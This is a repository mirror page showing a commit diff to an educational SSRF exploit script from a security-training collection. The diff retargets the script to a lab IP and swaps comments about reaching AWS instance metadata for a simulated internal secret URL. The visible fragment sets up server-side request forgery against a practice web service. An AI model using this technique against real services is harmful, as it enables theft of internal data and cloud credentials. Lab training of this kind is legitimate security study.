Awesome-Mirrors
/
cyber-security-resources
mirror of https://github.com/The-Art-of-Hacking/h4cker.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #164 from The-Art-of-Hacking/santosomar-patch-7 

Update ssrf_galatic_archives.py
This commit is contained in:
Omar Santos 2023-07-03 23:11:43 -04:00 committed by GitHub
parent af555144a3 1c5360691b
commit 8ef5602af9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
web_application_testing/ssrf_galatic_archives.py
View File

@ -6,11 +6,10 @@ Author: Omar Santos @santosomar
import requests
# The URL of the vulnerable web service.
vulnerable_url = 'http://127.0.0.1:5000'
vulnerable_url = 'http://10.6.6.20:5000'
# The internal URL that the attacker wants to access.
# AWS EC2 instances use this URL to provide instance metadata.
# This data should be inaccessible from outside the EC2 instance.
# This is to simulate that this data (secret.txt) should be inaccessible from attacker's network.
internal_url = 'https://internal.secretcorp.org/secret.txt'
# The attacker constructs the exploit URL by appending the internal URL